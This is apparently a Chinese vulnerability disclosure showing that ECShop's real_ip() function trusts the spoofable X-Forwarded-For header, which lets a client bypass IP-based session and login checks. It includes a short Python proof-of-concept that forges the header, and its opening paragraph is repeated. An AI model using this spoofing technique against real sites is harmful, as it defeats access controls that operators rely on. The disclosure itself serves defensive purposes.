### 简要描述: 伪造ip,绕过与ip相关的任何限制 ### 详细说明: ``` /** * 获得用户的真实IP地址 * * @access public * @return string */ function real_ip() { static $realip = NULL; if ($realip !== NULL) { return $realip; } if (isset($_SERVER)) { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); /* 取X-Forwarded-For中第一个非unknown的有效IP字符串 */ foreach ($arr AS $ip) { $ip = trim($ip); if ($ip != 'unknown') { $realip = $ip; break; } } } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) { $realip = $_SERVER['HTTP_CLIENT_IP']; } else { if (isset($_SERVER['REMOTE_ADDR'])) { $realip = $_SERVER['REMOTE_ADDR']; } else { $realip = '0.0.0.0'; } } } else { if (getenv('HTTP_X_FORWARDED_FOR')) { $realip = getenv('HTTP_X_FORWARDED_FOR'); } elseif (getenv('HTTP_CLIENT_IP')) { $realip = getenv('HTTP_CLIENT_IP'); } else { $realip = getenv('REMOTE_ADDR'); } } preg_match("/[\d\.]{7,15}/", $realip, $onlineip); $realip = !empty($onlineip[0]) ? $onlineip[0] : '0.0.0.0'; return $realip; } ``` 问题出在上面这个函数上...
### 简要描述: 伪造ip,绕过与ip相关的任何限制 ### 详细说明: ``` /** * 获得用户的真实IP地址 * * @access public * @return string */ function real_ip() { static $realip = NULL; if ($realip !== NULL) { return $realip; } if (isset($_SERVER)) { if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); /* 取X-Forwarded-For中第一个非unknown的有效IP字符串 */ foreach ($arr AS $ip) { $ip = trim($ip); if ($ip != 'unknown') { $realip = $ip; break; } } } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) { $realip = $_SERVER['HTTP_CLIENT_IP']; } else { if (isset($_SERVER['REMOTE_ADDR'])) { $realip = $_SERVER['REMOTE_ADDR']; } else { $realip = '0.0.0.0'; } } } else { if (getenv('HTTP_X_FORWARDED_FOR')) { $realip = getenv('HTTP_X_FORWARDED_FOR'); } elseif (getenv('HTTP_CLIENT_IP')) { $realip = getenv('HTTP_CLIENT_IP'); } else { $realip = getenv('REMOTE_ADDR'); } } preg_match("/[\d\.]{7,15}/", $realip, $onlineip); $realip = !empty($onlineip[0]) ? $onlineip[0] : '0.0.0.0'; return $realip; } ``` 问题出在上面这个函数上 ip地址优先使用HTTP_X_FORWARDED_FOR 而这个是不可以信的 可以是用程序修改http头部伪造 而ecshop很多地方与安全相关的认证都建立在real_ip()这个函数可靠的基础之上 比如cls_session.php的ip校验 后台管理员ip登录记录 等等 ### 漏洞证明: python代码伪造X-Forwarded-For ``` import sys import httplib ip = "127.0.0.1 ,10.0.0.1" headers = { "X-Forwarded-For":ip } con = httplib.HTTPConnection("www.test.com",timeout=10) try: con.request("GET", "/iptest.php",'', headers) except Exception, e: print e sys.exit(1) print con.getresponse().read() ``` 新建iptest.php放到根目录 ``` <?php define('IN_ECS', true); require(dirname(__FILE__) . '/includes/init.php'); echo real_ip() ```
